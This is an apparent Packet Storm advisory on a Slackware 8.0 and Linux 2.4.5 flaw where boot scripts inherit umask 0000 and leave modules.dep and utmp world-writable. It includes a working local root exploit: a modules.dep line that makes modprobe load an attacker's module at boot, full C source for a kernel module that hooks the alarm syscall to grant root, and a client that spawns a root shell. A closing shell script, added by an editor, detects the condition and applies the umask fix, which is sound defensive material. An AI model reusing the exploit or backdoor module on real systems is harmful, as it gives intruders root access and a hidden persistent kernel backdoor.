slackware.init.txt

2001-07-18T00:00:00
ID PACKETSTORM:25013
Type packetstorm
Reporter Josh
Modified 2001-07-18T00:00:00

Description

                                        
                                            `I posted this to the linux kernel mailing last Friday, July 13th 2001:  
  
Submitted by : Josh (josh@pulltheplug.com), lockdown  
(lockdown@lockeddown.net) on July 16th, 2001  
Vulnerability : /lib/modules/2.4.5/modules.dep  
Tested On : Slackware 8.0, Linux 2.4.5  
Local : Yes  
Remote : No  
Temporary Fix : umask 022 at the top of all your startup scripts  
Target : root  
Big thanks to : slider, lamagra, zen-parse  
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,  
cryptix, s0ttle, xphantom, qtip, tirancy, Loki,  
falcon-networks.com.  
  
The 2.4.x kernels, starting with 2.4.3 (I think), leave init running with a  
umask of 0000 after boot. Every process started from the rc scripts inherits  
that umask, so any file a boot script creates without first issuing the  
command `umask 022` gets mode 0666 (0666 & ~0000), that is, world-writable.  
On Slackware these files include /var/run/utmp and /var/run/gpm.pid. The  
same problem makes /lib/modules/`uname -r`/modules.dep, which the boot  
scripts regenerate, world-writable. With that file world-writable, all an  
intruder need do is put something like the following in  
/lib/modules/`uname -r`/modules.dep, assuming the system's startup scripts  
modprobe lp:  
  
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o  
  
/tmp/alarm.o:  
  
modprobe resolves dependencies from modules.dep and insmods them before the  
module that needs them, so at the next boot `modprobe lp`, run as root from  
the rc scripts, loads /tmp/alarm.o into the kernel first. The alarm.o module  
is:  
  
/* alarm.o: hooks the alarm(2) system call so that alarm(454) from any  
 * process sets the caller's uid/euid/gid/egid to 0. Written for the 2.4.5  
 * kernel, which still exports sys_call_table and keeps the credentials  
 * directly in struct task_struct; compiled with -D__KERNEL__ -DMODULE  
 * against the 2.4.5 headers. */  
#include <linux/config.h>  
#include <linux/module.h>  
#include <linux/version.h>  
#include <linux/types.h>  
#include <linux/kernel.h>  
#include <linux/sched.h>  
#include <linux/errno.h>  
#include <linux/fs.h>  
#include <asm/unistd.h>   /* __NR_alarm */  
  
extern void *sys_call_table[];  
  
/* Saved pointer to the real sys_alarm. */  
static unsigned int (*old_alarm)(unsigned int seconds);  
  
/* Replacement for sys_alarm: the magic argument 454 elevates the calling  
 * process to root; anything else is passed through to the real alarm(). */  
static unsigned int hacked_alarm(unsigned int seconds)  
{  
    if (seconds == 454) {  
        current->uid = 0;  
        current->euid = 0;  
        current->gid = 0;  
        current->egid = 0;  
        return 0;  
    }  
    return old_alarm(seconds);  
}  
  
int init_module(void)  
{  
    old_alarm = (unsigned int (*)(unsigned int)) sys_call_table[__NR_alarm];  
    sys_call_table[__NR_alarm] = (void *) hacked_alarm;  
    return 0;  
}  
  
void cleanup_module(void)  
{  
    sys_call_table[__NR_alarm] = (void *) old_alarm;  
}  
  
make a client:  
  
#include <stdio.h>  
#include <unistd.h>  
  
int main(void)  
{  
    /* Magic value recognised by the hooked alarm() in alarm.o. */  
    alarm(454);  
    /* The process is now uid 0; hand it to a shell. */  
    execl("/bin/sh", "sh", (char *) NULL);  
    perror("execl");  
    return 1;  
}  
  
which, once the module is loaded, drops the caller into a root shell.  
  
  
And of course with /var/run/utmp writable, users can delete or otherwise  
manipulate their login records as they appear in w, who, finger, getlogin(),  
etc.  
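The following shell script is an added example; it is not part of the advisory and not Slackware's rc code. It exercises the umask problem and its checks on constructed files: a file created the way a boot script creates one comes out mode 666 under umask 0000 and 644 under umask 022; a world-writable-file sweep of the kind to run over /var/run and /lib/modules/`uname -r`; a scan of a modules.dep for entries that reach outside /lib/modules (the /tmp/alarm.o trick); and the advisory's temporary fix applied mechanically, inserting `umask 022` at the top of an rc script that lacks one. The function names and the sample modules.dep and rc.M contents are assumptions of the example, not taken from the advisory.

```shell
#!/bin/sh
# Added example, not code from the advisory. Function names and sample
# inputs are the editor's own; POSIX sh only.

# Octal permission bits of a file (GNU stat first, BSD stat as fallback).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Create a file the way an rc script does (redirect into a new file) under
# the given umask, in a subshell so the caller's umask is untouched, and
# print the resulting mode: 666 under umask 0000, 644 under umask 022.
create_with_umask() {
    rm -f "$2"
    ( umask "$1"; : > "$2" )
    mode_of "$2"
}

# List world-writable regular files below a directory, one per line.
# Run over /var/run and /lib/modules/`uname -r` to see what a boot left.
find_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | sort
}

# Report modules.dep entries that reach outside /lib/modules. The 2.4
# modutils format is "<module>: <dep> <dep> ...", with backslash-continued
# lines. A dependency such as /tmp/alarm.o makes modprobe insmod that file,
# as root, before the module that "needs" it. Prints nothing when clean.
foreign_deps() {
    acc=''
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            *\\) acc="$acc${line%\\} "; continue ;;   # join continued lines
        esac
        line="$acc$line"
        acc=''
        case "$line" in
            ''|'#'*) continue ;;
            *:*) ;;
            *) continue ;;
        esac
        mod=${line%%:*}
        deps=${line#*:}
        case "$mod" in
            /lib/modules/*) ;;
            *) echo "$mod (module outside /lib/modules)" ;;
        esac
        for d in $deps; do
            case "$d" in
                /lib/modules/*) ;;
                *) echo "$mod -> $d" ;;
            esac
        done
    done < "$1"
}

# The advisory's temporary fix applied to one rc script: insert "umask 022"
# as the first command unless the script already sets a umask, keeping a
# leading #! line in place. Prints the script's first non-comment line.
ensure_umask() {
    script=$1
    if ! grep -q '^[[:space:]]*umask[[:space:]]' "$script"; then
        tmp="$script.tmp.$$"
        if [ "$(head -n 1 "$script" | cut -c1-2)" = '#!' ]; then
            { head -n 1 "$script"; echo 'umask 022'; tail -n +2 "$script"; } > "$tmp"
        else
            { echo 'umask 022'; cat "$script"; } > "$tmp"
        fi
        mv "$tmp" "$script"
    fi
    grep -v '^[[:space:]]*#' "$script" | grep -v '^[[:space:]]*$' | head -n 1
}
```

Source the file and call the functions directly, for instance `find_world_writable /var/run` and `foreign_deps /lib/modules/$(uname -r)/modules.dep` after a boot. `ensure_umask` only patches scripts that contain no umask line at all, so a script that deliberately sets a looser umask further down is left for a human to look at.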